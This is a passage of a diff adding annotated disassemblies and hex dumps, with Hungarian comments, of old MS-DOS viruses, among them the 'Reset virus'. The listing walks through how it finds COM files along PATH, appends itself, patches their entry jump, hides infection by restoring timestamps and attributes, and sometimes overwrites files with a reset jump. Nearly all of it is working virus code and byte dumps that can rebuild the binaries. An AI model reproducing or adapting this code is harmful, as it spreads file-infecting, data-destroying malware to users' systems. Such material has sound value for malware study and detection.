elmentse +0389 53 PUSH BX +038A 51 PUSH CX +038B 52 PUSH DX +038C 06 PUSH ES +038D 1E PUSH DS +038E 57 PUSH DI +038F 56 PUSH SI +0390 E80000 CALL 0393 ;Lebuks !! (/g) +0393 5B POP BX ;BX=0393 + + ;A: BOOT beolvassa/Tltget lekrdezse + +0394 BEA55A MOV SI,5AA5 ;Tltget lekrdezse +0397 BFAA55 MOV DI,55AA +039A 0E PUSH CS +039B 07 POP ES +039C 81C3E803 ADD BX,03E8 ;BX=077B +03A0 81FBE803 CMP BX,03E8 +03A4 7303 JNB 03A9 +03A6 E98200 JMP 042B ;Ha nincs elg szabad memria a szegmensen +03A9 53 PUSH BX +03AA B80102 MOV AX,0201 ;A:BOOT beolvassa +03AD BA0000 MOV DX,0000 +03B0 B90100 MOV CX,0001 +03B3 CD13 INT 13 +03B5 5B POP BX +03B6 7308 JNB 03C0 +03B8 80FC06 CMP AH,06 ;Ha lemezcsere volt, az nem hiba +03BB 74EC JZ 03A9 +03BD EB6C JMP 042B ;Valdi hiba->vge +03BF 90 NOP +03C0 81FE5AA5 CMP SI,A55A +03C4 7465 JZ 042B ;Vge, ha a Tltget mr a memriban van + + ;Van-e elg szabad memria a Tltget beolvasshoz + +03C6 8CC8 MOV AX,CS +03C8 050010 ADD AX,1000 +03CB 53 PUSH BX +03CC 50 PUSH AX +03CD CD12 INT 12 ;Max mem. +03CF BB4000 MOV BX,0040 +03D2 F7E3 MUL BX ;AX-ben a memria tetejnek szegmense +03D4 2D0010 SUB AX,1000 ;legalbb 4Kb kell a Tltgetnek +03D7 8BD8 MOV BX,AX +03D9 58 POP AX ;CS+1000 +03DA 3BD8 CMP BX,AX +03DC 7304 JNB 03E2 +03DE 5B POP BX +03DF EB4A JMP 042B ;Vge, ha nincs elg szabad memria +03E1 90 NOP + + ; A lemez utls svjnak megkeresse + +03E2 5B POP BX ;BX=077B +03E3 8EC0 MOV ES,AX ;Max mem-1000 +03E5 2E CS: +03E6 8B4718 MOV AX,[BX+18] ;Sv hossza +03E9 2E CS: +03EA 8B4F1A MOV CX,[BX+1A] ;Oldalak szma +03ED F7E1 MUL CX +03EF 8BC8 MOV CX,AX ;Egy cilinder nagysga +03F1 2E CS: +03F2 8B4713 MOV AX,[BX+13] ;Szektorok szma +03F5 BA0000 MOV DX,0000 +03F8 F7F1 DIV CX ;Osztva a cilinder nagysgval AL-ben a sv + + ; Az utls sv beolvassa + +03FA 81EBE803 SUB BX,03E8 ;BX=0393 +03FE 53 PUSH BX +03FF 8AE8 MOV CH,AL ;40/80-dik sv +0401 B101 MOV CL,01 +0403 BB0001 MOV BX,0100 ;ES:BX-re olvas ! +0406 BA0000 MOV DX,0000 +0409 B80802 MOV AX,0208 ;8 szektor beolvassa +040C CD13 INT 13 +040E 5B POP BX +040F 721A JB 042B ;Hibnl vge + + ; Ha a Tltgett tall, elindtja + +0411 53 PUSH BX +0412 BB0001 MOV BX,0100 +0415 26 ES: +0416 8B07 MOV AX,[BX] +0418 3D5224 CMP AX,2452 ;Azonost +041B 5B POP BX +041C 750D JNZ 042B ;Ha nem Tltget +041E 8BC3 MOV AX,BX +0420 059800 ADD AX,0098 ;AX=042B (A visszatrsre mutat) +0423 0E PUSH CS +0424 50 PUSH AX +0425 B80A01 MOV AX,010A ;Tltget belpsi pontja +0428 06 PUSH ES +0429 50 PUSH AX +042A CB RETF + + ; Visszatrs + +042B 5E POP SI ;Regiszterek vissza +042C 5F POP DI +042D 1F POP DS +042E 07 POP ES +042F 5A POP DX +0430 59 POP CX +0431 5B POP BX +0432 58 POP AX +0433 C3 RET +0434 0000 DW 0000 ;??? + + + A vrus hexa dumpja : + + +0100 51 BA F9 02 FC 8B F2 81-C6 0A 00 BF 00 01 B9 03 Q............... +0110 00 F3 A4 8B F2 B4 30 CD-21 3C 00 75 03 E9 C7 01 ......0.!<.u.... +0120 06 B4 2F CD 21 89 9C 00-00 8C 84 02 00 E8 58 02 ../.!.........X. +0130 07 BA 5F 00 90 03 D6 B4-1A CD 21 06 56 8E 06 2C .._.......!.V.., +0140 00 BF 00 00 5E 56 81 C6-1A 00 AC B9 00 80 F2 AE ....^V.......... +0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^...... +0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:. +0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,. +0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t. +0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[..... +01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........ +01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N.... +01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s.. +01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y.. +01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V. +01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C... +0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C.... +0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=..... +0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!. +0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!..... +0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?. +0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u +0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC.. +0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -............... +0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........! +0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B...... +02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@.......... +02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !............... +02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C... +02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!....... +02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3. +02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...! +0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q +0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO +0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM. +0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20 +0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20 +0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .??????? +0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so .. +0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM. +0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV +0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U...... +03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S...... +03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l. +03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP... +03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[. +03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O.... +03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S. +0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r +0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u... +0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z +0430 59 5B 58 C3 00 00 Y[X... + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.v_dos625.asm b/MSDOS/Virus.MSDOS.Unknown.v_dos625.asm new file mode 100644 index 00000000..f5174385 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_dos625.asm @@ -0,0 +1,571 @@ +Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari + (41) 21-033 + + + +Unassemble list: + +114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere +114E:0103 49 DEC CX +114E:0104 60 DB 60 +114E:0105 61 DB 61 +114E:0106 6D DB 6D +114E:0107 206120 AND [BX+DI+20],AH +114E:010A 52 PUSH DX +114E:010B 65 DB 65 +114E:010C 7365 JNB 0173 +114E:010E 7420 JZ 0130 +114E:0110 56 PUSH SI +114E:0111 49 DEC CX +114E:0112 52 PUSH DX +114E:0113 55 PUSH BP +114E:0114 53 PUSH BX +114E:0115 2124 AND [SI],SP +114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott + ;program kezdete +114E:011A B409 MOV AH,09 +114E:011C CD21 INT 21 ;uzenet kepernyore +114E:011E B400 MOV AH,00 +114E:0120 CD20 INT 20 ;exit to DOS + +114E:0122 51 PUSH CX ;stack-en marad + + ;a kovetkezo utasitas operandusat fertozeskor + ;allitja be, igy mindig a helyes cimre mutat + +114E:0123 BA1B03 MOV DX,031B +114E:0126 FC CLD ;elore +114E:0127 8BF2 MOV SI,DX +114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte +114E:012D BF0001 MOV DI,0100 ;program eleje +114E:0130 B90300 MOV CX,0003 ;3 byte +114E:0133 F3 REPZ +114E:0134 A4 MOVSB ;eredeti JMP 117 + ;visszamasolasa +114E:0135 8BF2 MOV SI,DX +114E:0137 B430 MOV AH,30 +114E:0139 CD21 INT 21 ;DOS verzio szam lekerd. +114E:013B 3C00 CMP AL,00 +114E:013D 7503 JNZ 0142 +114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor + ;nem fertoz a virus s + ;futtatja az eredeti + ;programot +114E:0142 06 PUSH ES +114E:0143 B42F MOV AH,2F +114E:0145 CD21 INT 21 ;DTA. lekerdezese +114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset +114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese +114E:014F 07 POP ES + + ;DTA. beallitasa az ENTRY cimere /dir.-bol/ + ;ide masolja a find first a file adatait + +114E:0150 BA5F00 MOV DX,005F ;DX=037a +114E:0153 90 NOP +114E:0154 03D6 ADD DX,SI +114E:0156 B41A MOV AH,1A +114E:0158 CD21 INT 21 ;DTA. letrehozasa + ;037a-tol uj cimre +114E:015A 06 PUSH ES +114E:015B 56 PUSH SI +114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense +114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a + ;kovetkezo dir.-ra mu- + ;tatni +114E:0163 5E POP SI +114E:0164 56 PUSH SI +114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo + ;stringet keresi a + ;kornyezetbe PATH +114E:0169 AC LODSB ;AL=DS:[SI],SI++ +114E:016A B90080 MOV CX,8000 ;32 kbyte +114E:016D F2 REPNZ +114E:016E AE SCASB ;megkeresi a kovetke- + ;zo P betut +114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi +114E:0172 AC LODSB +114E:0173 AE SCASB ;betunkent hasonlitja +114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI. + ;karakter /kov.betu/ +114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es + ;osszehasonlitja a tobbi + ;betut is +114E:0178 5E POP SI +114E:0179 07 POP ES ;ES:DI mutat az elso + ;PATH-ra +114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file + ;spec. cimenek mentese + ;PATH mutato +114E:017E 8BFE MOV DI,SI ;SI=031b +114E:0180 81C71F00 ADD DI,001F ;DI=033a +114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu- + ;tat az adatokra +114E:0186 81C61F00 ADD SI,001F ;SI=033a +114E:018A 8BFE MOV DI,SI ;DI=033a +114E:018C EB3A JMP 01C8 + + ;A kovetkezo PATH-ban megadott aldirectoryt + ;File Path-ra masolja, igy a kovetkezo file-t + ;ebben az aldirectoryban keresi + +114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ; +114E:0193 7503 JNZ 0198 +114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva +114E:0198 1E PUSH DS +114E:0199 56 PUSH SI +114E:019A 26 ES: +114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense +114E:019F 8BFE MOV DI,SI ;DI=033a +114E:01A1 26 ES: +114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path + ;masolasa ha az aktualis + ;konyvtarban nem talalt + ;fertozheto file-t + ;a PATH= utanra mutat + ;az SI +114E:01A6 81C71F00 ADD DI,001F +114E:01AA AC LODSB ;beolvas a kornyezetbol + ;a 0029. byte-ot +114E:01AB 3C3B CMP AL,3B ;pontosvesszo ? +114E:01AD 740A JZ 01B9 ;igen +114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz + ;tobb +114E:01B1 7403 JZ 01B6 ;igen +114E:01B3 AA STOSB ;letarol 033a-tol +114E:01B4 EBF4 JMP 01AA + +114E:01B6 BE0000 MOV SI,0000 +114E:01B9 5B POP BX ;BX=regi SI BX mutat + ;az adatokra +114E:01BA 1F POP DS +114E:01BB 89B71600 MOV [BX+0016],SI + + ;a kovetkezo PATH-ban adott dir. mar atmasolva + +114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ? +114E:01C3 7403 JZ 01C8 ;igen +114E:01C5 B05C MOV AL,5C ;egyebkent \ iras + + ;egy aldir. kiertekelese, eloszor az aktualis, majd + ;a file path -ra masolt aldir. vegignezese, fertozes + ;DI a file path-ba irt aldir. neve utani poz.-ra mu- + ;tat + + ;COM file keresese + +114E:01C7 AA STOSB ;\ jel beirasa +114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a + ;file nevet masolni, + ;az aldir. neve utan +114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d +114E:01CE 81C61000 ADD SI,0010 ;SI=032b +114E:01D2 B90600 MOV CX,0006 +114E:01D5 F3 REPZ +114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa + ;a PATH= szoveg utan +114E:01D7 8BF3 MOV SI,BX +114E:01D9 B44E MOV AH,4E ;a file adatai a DTA. + ;alltal foglalt teru- + ;letre +114E:01DB BA1F00 MOV DX,001F +114E:01DE 90 NOP +114E:01DF 03D6 ADD DX,SI +114E:01E1 B90300 MOV CX,0003 +114E:01E4 CD21 INT 21 ;elso file bejegyzes ke- + ;resese, az it. aktivi- + ;zalasa utan felhozza a + ;filemeretet, attrib.ot + ;keletkezes datumat s + ;idejet is! +114E:01E6 EB04 JMP 01EC ;vizsgalatra +114E:01E8 B44F MOV AH,4F +114E:01EA CD21 INT 21 ;kovetkezo file bejegy- + ;zes keresese +114E:01EC 7302 JNB 01F0 ;ha nincs hiba +114E:01EE EB9E JMP 018E ;hiba eseten -ha nem + ;talal tobb COM file-t + ;mas aldirt keres + ;mar talalt COM file-t, az adataival az entry fel + ;van toltve, a file ellenorzese es fertozese + ;kovetkezik + +114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be + ;SI=0390 +114E:01F4 241F AND AL,1F ;maszk 31 -el +114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto- + ;zott a file! +114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo + ;file-t keresi +114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00 +114E:0200 77E6 JA 01E8 ;ha > a file meret + ;64000 byte-nal +114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A +114E:0207 72DF JB 01E8 ;ha < 10 byte nal +114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a + + ;megvan a kivalasztott file + ;a file nevet a filespec utan kell masolni + +114E:020D 56 PUSH SI ;DI mutat a filespec.re, + ;PATH=*.COM +114E:020E 81C67D00 ADD SI,007D ;SI=0398 + +114E:0212 AC LODSB ;atmasolja a filenevet + ;/megkeresett elso v. + ;x.edik bejegyzest/ +114E:0213 AA STOSB +114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle- + ;zaro nullaig masol +114E:0216 75FA JNZ 0212 ;nem +114E:0218 5E POP SI ;SI ujra az adatokra mu- + ;tat + ;a file egyes eredeti informacioinak megorzese + ;hogy a fertozese ne tunjon fel + ;minek a file ATTR. megegyszer lekerdezni? + +114E:0219 B80043 MOV AX,4300 +114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec. +114E:021F 90 NOP +114E:0220 03D6 ADD DX,SI ;DX=031b +114E:0222 CD21 INT 21 ;attributum lekerdezese + ;7.6.5.4.3.2.1.0. + ;x x a d v s h r +114E:0224 898C0800 MOV [SI+0008],CX ;attributum +114E:0228 B80143 MOV AX,4301 +114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC. + ;ra valtoztatja +114E:022F BA1F00 MOV DX,001F +114E:0232 90 NOP +114E:0233 03D6 ADD DX,SI ;DX=033a +114E:0235 CD21 INT 21 ;attributum beallitasa + + ;file nyitasa + +114E:0237 B8023D MOV AX,3D02 +114E:023A BA1F00 MOV DX,001F +114E:023D 90 NOP +114E:023E 03D6 ADD DX,SI ;DS:DX = filespec. +114E:0240 CD21 INT 21 ;file nyitasa I/O ra +114E:0242 7303 JNB 0247 +114E:0244 E9A500 JMP 02EC ;hiba eseten nincs + ;fertozes +114E:0247 8BD8 MOV BX,AX ;handle + + ;a file idejenek lekerdezese de ez is megtalalhato az + ;ENTRY teruleten + +114E:0249 B80057 MOV AX,5700 +114E:024C CD21 INT 21 ;file letrehozasi datum + ;es ido bekerese +114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc + DH-sec DL-1/100 +114E:0252 89940600 MOV [SI+0006],DX ;datum +114E:0256 B42C MOV AH,2C +114E:0258 CD21 INT 21 ;rendszerido bekerese + + ;annak eldontese hogy a filet tonkretegye-e + ;ha a masodperc 7 akkor tonkreteszi /aktualis/ + +114E:025A 80E607 AND DH,07 ;sec = 7 ? +114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre! + + ;file tonkretetele + +114E:025F B440 MOV AH,40 +114E:0261 B90500 MOV CX,0005 +114E:0264 8BD6 MOV DX,SI ;reset +114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0 +114E:026A CD21 INT 21 ;file elejere ir 5 byte + ;-ot a RESET re ugrast! +114E:026C EB65 JMP 02D3 + +114E:026E 90 NOP + + ;fertozes + ;az eredeti 3 byte megorzese hogy kesobb meg futtatni + ;lehessen + +114E:026F B43F MOV AH,3F +114E:0271 B90300 MOV CX,0003 +114E:0274 BA0A00 MOV DX,000A +114E:0277 90 NOP +114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA +114E:027A CD21 INT 21 ;a program eredeti elso + ;3 byte-jat beolvassa +114E:027C 7255 JB 02D3 ;ha hiba van +114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ? +114E:0281 7550 JNZ 02D3 ;nem + + ;file vegere allas az uj cimek kiszamitasa + +114E:0283 B80242 MOV AX,4202 +114E:0286 B90000 MOV CX,0000 +114E:0289 BA0000 MOV DX,0000 +114E:028C CD21 INT 21 ;file vegere pozicional +114E:028E 7243 JB 02D3 ;ha hiba volt -nem + ;nagyon lehet hiba! + + ;file elejere irando JMP operandus kiszamitasa + +114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz +114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP + ;utasitashoz amit a + ;file elejere fog irni + ;igy a JMP a file mos- + ;tani vege utani bytera + ;fog mutatni +114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim + + ;az uj file-on beluli adatterulet cimenek ki- + ;szamitasa es beallitasa + +114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli + ;adatteruletre mutat +114E:029D 8BFE MOV DI,SI +114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa- + ;nak operandusanak + ;cime +114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet + ;cimet + + ;file moge masolja magat + ;filemutato a file vegere mutat + +114E:02A5 B440 MOV AH,40 +114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza +114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara + ;mutat +114E:02AC 81EAF901 SUB DX,01F9 +114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a + ;program a fertozendo + ;program moge irja +114E:02B2 721F JB 02D3 ;hiba eseten +114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ? +114E:02B7 751A JNZ 02D3 ;igen + + ;az elso 3 byte atallitasa, egy file + ;vegere mutato ugro utasitasra + +114E:02B9 B80042 MOV AX,4200 +114E:02BC B90000 MOV CX,0000 +114E:02BF BA0000 MOV DX,0000 +114E:02C2 CD21 INT 21 ;file pointer a vegere +114E:02C4 720D JB 02D3 ;ha volt hiba -nem le- + ;het hiba! +114E:02C6 B440 MOV AH,40 +114E:02C8 B90300 MOV CX,0003 +114E:02CB 8BD6 MOV DX,SI +114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra + ;mutat +114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba + + ;az eredeti ido -mar a fertozesjelzessel egyutt- + ;visszaallitasa + +114E:02D3 8B940600 MOV DX,[SI+0006] ;datum +114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido +114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges! +114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy + ;jelzi hogy mar ferto- + ;zott egy file a SEC. + ;-et 31-re allitja a + ;file bejegyzesben + ; hour | min. | sec. + ;1111 1|111 111|0 0000 +114E:02E3 B80157 MOV AX,5701 +114E:02E6 CD21 INT 21 ;file keletk. ido beall. + + ;file zarasa + +114E:02E8 B43E MOV AH,3E +114E:02EA CD21 INT 21 ;file zarasa + + ;eredeti attributum visszaallitasa + +114E:02EC B80143 MOV AX,4301 +114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./ +114E:02F3 BA1F00 MOV DX,001F +114E:02F6 90 NOP + + ;DTA. visszaallitasa az eredeti cimre + +114E:02F7 03D6 ADD DX,SI +114E:02F9 CD21 INT 21 ;file attr. beallitasa +114E:02FB 1E PUSH DS +114E:02FC B41A MOV AH,1A +114E:02FE 8B940000 MOV DX,[SI+0000] +114E:0302 8E9C0200 MOV DS,[SI+0002] +114E:0306 CD21 INT 21 ;DTA. megadasa +114E:0308 1F POP DS + + ;az eredeti program futtatasa + +114E:0309 59 POP CX +114E:030A 33C0 XOR AX,AX ;reg. nullazasa +114E:030C 33DB XOR BX,BX +114E:030E 33D2 XOR DX,DX +114E:0310 33F6 XOR SI,SI +114E:0312 BF0001 MOV DI,0100 +114E:0315 57 PUSH DI ;elteszi a 0100 offsetet + ;hogy a RET elo tudja + ;venni es odaugrik +114E:0316 33FF XOR DI,DI +114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset- + ;re, ott mar az eredeti + ;JMP 117 utasitas van, + ;igy vegrehajtodik az + ;eredeti prg. + ;SP- hogy minek ? +114E:031B 800046 ADD BYTE PTR [BX+SI],46 +114E:031E 0D2001 OR AX,0120 +114E:0321 2100 AND [BX+SI],AX +114E:0323 2000 AND [BX+SI],AL +114E:0325 EB15 JMP 033C +114E:0327 90 NOP +114E:0328 E91F00 JMP 034A +114E:032B 2A2E434F SUB CH,[4F43] +114E:032F 4D DEC BP +114E:0330 0028 ADD [BX+SI],CH +114E:0332 004703 ADD [BX+03],AL +114E:0335 50 PUSH AX +114E:0336 41 INC CX +114E:0337 54 PUSH SP +114E:0338 48 DEC AX +114E:0339 3D5245 CMP AX,4552 +114E:033C 53 PUSH BX +114E:033D 45 INC BP +114E:033E 54 PUSH SP +114E:033F 2E CS: +114E:0340 43 INC BX +114E:0341 4F DEC DI +114E:0342 4D DEC BP +114E:0343 0000 ADD [BX+SI],AL +114E:0345 0000 ADD [BX+SI],AL +114E:0347 4D DEC BP +114E:0348 004449 ADD [SI+49],AL +114E:034B 54 PUSH SP +114E:034C 2E CS: +114E:034D 43 INC BX +114E:034E 4F DEC DI +114E:034F 4D DEC BP +114E:0350 0000 ADD [BX+SI],AL +114E:0352 2020 AND [BX+SI],AH +114E:0354 2020 AND [BX+SI],AH +114E:0356 2020 AND [BX+SI],AH +114E:0358 2020 AND [BX+SI],AH +114E:035A 2020 AND [BX+SI],AH +114E:035C 2020 AND [BX+SI],AH +114E:035E 2020 AND [BX+SI],AH +114E:0360 2020 AND [BX+SI],AH +114E:0362 2020 AND [BX+SI],AH +114E:0364 2020 AND [BX+SI],AH +114E:0366 2020 AND [BX+SI],AH +114E:0368 2020 AND [BX+SI],AH +114E:036A 2020 AND [BX+SI],AH +114E:036C 2020 AND [BX+SI],AH +114E:036E 2020 AND [BX+SI],AH +114E:0370 2020 AND [BX+SI],AH +114E:0372 2020 AND [BX+SI],AH +114E:0374 2020 AND [BX+SI],AH +114E:0376 2020 AND [BX+SI],AH +114E:0378 2020 AND [BX+SI],AH +114E:037A 013F ADD [BX],DI +114E:037C 3F AAS +114E:037D 3F AAS +114E:037E 3F AAS +114E:037F 3F AAS +114E:0380 3F AAS +114E:0381 3F AAS +114E:0382 3F AAS +114E:0383 43 INC BX +114E:0384 4F DEC DI +114E:0385 4D DEC BP +114E:0386 0301 ADD AX,[BX+DI] +114E:0388 0000 ADD [BX+SI],AL +114E:038A 002E8B26 ADD [268B],CH +114E:038E 68 DB 68 +114E:038F 2020 AND [BX+SI],AH +114E:0391 0121 ADD [BX+DI],SP +114E:0393 0022 ADD [BP+SI],AH +114E:0395 0000 ADD [BX+SI],AL +114E:0397 005245 ADD [BP+SI+45],DL +114E:039A 53 PUSH BX +114E:039B 45 INC BP +114E:039C 54 PUSH SP +114E:039D 2E CS: +114E:039E 43 INC BX +114E:039F 4F DEC DI +114E:03A0 4D DEC BP +114E:03A1 0000 ADD [BX+SI],AL +114E:03A3 4D DEC BP +114E:03A4 00EA ADD DL,CH +114E:03A6 F0 LOCK +114E:03A7 FF00 INC WORD PTR [BX+SI] +114E:03A9 F0 LOCK +114E:03AA 16 PUSH SS +114E:03AB 7C14 JL 03C1 + +Dump list: + +114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/. +114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L......... +114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L. +114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N......... +114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!........... +114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c: +114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye +114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\ +114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c: +114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal; +114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util......... +114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset +114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!.. +114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q............. +114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u.. +114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!......... +114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,. +114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V........... +114E:0170 04 00 AC AE 75 ED E2 